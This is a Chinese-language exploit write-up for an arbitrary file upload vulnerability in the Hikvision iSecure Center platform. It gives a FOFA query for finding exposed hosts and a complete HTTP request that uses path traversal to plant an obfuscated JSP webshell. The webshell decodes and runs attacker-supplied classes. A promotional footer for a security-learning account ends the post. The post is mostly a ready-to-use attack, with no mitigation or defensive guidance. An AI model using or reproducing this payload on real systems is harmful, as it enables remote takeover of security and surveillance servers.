1、漏洞描述
综合安防管理平台是一套“集成化”、“智能化”的平台,通过接入视频监控、一卡通、停车场、报警检测等系统的设备,获取边缘节点数据,实现安防信息化集成与联动,以电子地图为载体,融合各系统能力实现丰富的智能应用。海康威视isecure center 综合安防管理平台在lm目录处存在任意文件上传漏洞,利用该漏洞可控制服务器,存在严重危害。
2、影响版本
3、资产测绘
fofa:
app="HIKVISION-iSecure-Center"
4、漏洞复现
POST /lm/api/files;.css HTTP/1.1
Host: XXXX
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryVBf7Cs8QWsfwC82M
Content-Length: 1178
SL-CE-SUID: 39
------WebKitFormBoundaryVBf7Cs8QWsfwC82M
Content-Disposition: form-data; name="file"; filename="../../../../../tomcat85linux64.1/webapps/els/static/shell.jsp"
Content-Type: application/zip
<% String HZ6XV = request.getParameter("admin");if (HZ6XV != null) { class E74vekli extends/*Z5WGL66IkB*/ClassLoader { E74vekli(ClassLoader L902G8) { super(L902G8); } public Class HZ6XV(byte[] b) { return super.defineClass(b, 0, b.length);}}byte[] bytes = null;try {int[] aa = new int[]{99, 101, 126, 62, 125, 121, 99, 115, 62, 82, 81, 67, 85, 38, 36, 84, 117, 115, 127, 116, 117, 98}; String ccstr = "";for (int i = 0; i < aa.length; i++) {aa[i] = aa[i] ^ 0x010; ccstr = ccstr + (char) aa[i];}Class A16iI = Class.forName(ccstr);String k = new String(new byte[]{100,101,99,111,100,101,66,117,102,102,101,114});bytes = (byte[]) A16iI.getMethod(k, String.class).invoke(A16iI.newInstance(), HZ6XV);}catch (Exception e) {bytes = javax.xml.bind.DatatypeConverter.parseBase64Binary(HZ6XV);}Class aClass = new E74vekli(Thread.currentThread().getContextClassLoader()).HZ6XV(bytes);Object o = aClass.newInstance();o.equals(pageContext);} else {} %>
------WebKitFormBoundaryVBf7Cs8QWsfwC82M--
webshell管理工具连接:
正在学习网络安全的小伙伴,有需要安全资料或者CISP资料的可以关注安全技术达人公众号,后期回不断分享安全知识,回复“学习资料”可领取网络安全书籍。